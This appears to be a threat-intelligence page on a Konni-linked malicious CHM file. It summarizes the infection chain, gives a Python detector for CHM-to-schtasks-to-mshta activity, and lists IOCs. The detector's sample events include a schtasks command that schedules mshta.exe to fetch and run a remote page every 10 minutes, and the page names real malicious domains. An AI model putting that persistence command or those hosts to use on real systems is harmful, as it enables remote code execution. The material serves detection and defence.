Malware created by Konni(코니) - NService_youngji057.chm (2023.11.18)

2024-01-29 Sakai Malware created by Konni - NService_youngji057.chm (2023.11.18)

https://wezard4u.tistory.com/6721


Konni-related malware was distributed as NService_youngji057.rar and executed through a Windows CHM file that showed a Korean-language decoy requesting a seal certificate and a stamped power of attorney. The HTML embedded in the CHM used the Windows Help ActiveX shortcut object to create a scheduled task named ChromeBrowserUpdate that launched mshta.exe against hxxp://goodmarket(.)or(.)kr/admin/sms/3(.)html every 10 minutes. The follow-on HTA and PowerShell logic contacted goodmarket(.)or(.)kr/admin/sms/net(.)php with host and username data, downloaded or uploaded files in chunks, and used obfuscated PowerShell functions for command execution and staging. The source associates Konni with North Korea-linked Thallium and APT37 activity, notes Kimsuky as a possible connection, and provides MD5, SHA-1, and SHA-256 hashes for the CHM sample.
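The execution chain summarized above (CHM rendered by the HTML Help viewer, a scheduled task registered from it, mshta.exe fetching a remote page) leaves a recognizable trail in process-creation telemetry. The following detector is an added example written for this page; it is not code from the original post or from the summarized blog. It assumes Sysmon-style Event ID 1 fields (Image, ParentImage, CommandLine) and runs over constructed sample records; the task name and the /admin/sms/3.html path come from the summary, while the host example.invalid is a placeholder standing in for the real domain.

```python
"""Detect the CHM -> schtasks -> mshta.exe chain in process-creation events.

Added example for this page (not the original post's code). Record shape is
assumed to follow Sysmon Event ID 1 (Image, ParentImage, CommandLine); the
sample events below are constructed, with example.invalid as a placeholder host.
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str   # command line of the created process


HTML_HELP = "hh.exe"  # the Windows HTML Help viewer, which renders .chm files
LOLBINS = {"schtasks.exe", "cmd.exe", "powershell.exe", "mshta.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(event: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list if none)."""
    hits: list[str] = []
    img = basename(event.image)
    parent = basename(event.parent_image)
    cmd = event.command_line
    lower = cmd.lower()

    # Rule 1: a help file viewer spawning a scheduler or interpreter. A CHM has
    # no legitimate reason to do this; it is the footprint of the shortcut object.
    if parent == HTML_HELP and img in LOLBINS:
        hits.append("chm_spawns_lolbin")

    # Rule 2: schtasks.exe creating a task whose action is mshta.exe with a URL,
    # i.e. the persistence step described in the summary.
    if img == "schtasks.exe" and "/create" in lower and "mshta" in lower and URL_RE.search(cmd):
        hits.append("schtasks_mshta_remote")

    # Rule 3: mshta.exe executing a remote page. Normal use renders local .hta files.
    if img == "mshta.exe" and URL_RE.search(cmd):
        hits.append("mshta_remote_url")

    return hits


def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Return (index, rule names) for every event that matched at least one rule."""
    findings = []
    for i, ev in enumerate(events):
        hits = detect(ev)
        if hits:
            findings.append((i, hits))
    return findings


# Constructed sample telemetry (not real logs); host is a placeholder.
SAMPLE_EVENTS = [
    # Benign: a user opens an ordinary help file.
    ProcEvent(r"C:\Windows\hh.exe", r"C:\Windows\explorer.exe",
              r'"C:\Windows\hh.exe" C:\Docs\manual.chm'),
    # Malicious: the CHM registers a 10-minute task that runs mshta against a URL.
    ProcEvent(r"C:\Windows\System32\schtasks.exe", r"C:\Windows\hh.exe",
              r'schtasks /create /sc minute /mo 10 /tn ChromeBrowserUpdate '
              r'/tr "mshta.exe http://example.invalid/admin/sms/3.html" /f'),
    # Malicious: the scheduled task fires from the task scheduler service.
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\svchost.exe",
              r"mshta.exe http://example.invalid/admin/sms/3.html"),
    # Benign: an administrator runs a local HTA tool.
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
              r'mshta.exe "C:\Tools\inventory.hta"'),
]


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {basename(SAMPLE_EVENTS[idx].image)} -> {', '.join(rules)}")
```

Rule 1 catches the chain at its earliest point and is independent of the task name or URL, so it survives trivial retooling; rules 2 and 3 are narrower but give an analyst the persistence mechanism and the fetched URL directly. In a real deployment, feed it parsed Sysmon or EDR events and add the scheduled-task registration event (Security 4698 or Microsoft-Windows-TaskScheduler operational log) as a second data source.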

Indicators of Compromise

Type    Value                                 First Seen   Last Seen
DOMAIN  service.898840.com                    2024-01-29   2024-02-07
DOMAIN  s8u.cn                                2024-01-29   2024-02-07
HASH    521318321221435f7f6d2f1abed8d6c…      2024-01-29   2024-01-29
HASH    717d7c2ee8e97b512cbcecde3aa300c3      2024-01-29   2024-01-29
HASH    110d2f5e4e58f4209d1875dbcb5bbfa…      2024-01-29   2024-01-29
URL     http://goodmarket.or.kr/admin/s…      2024-01-29   2024-01-29
URL     http://goodmarket.or.kr/admin/s…      2024-01-29   2024-01-29
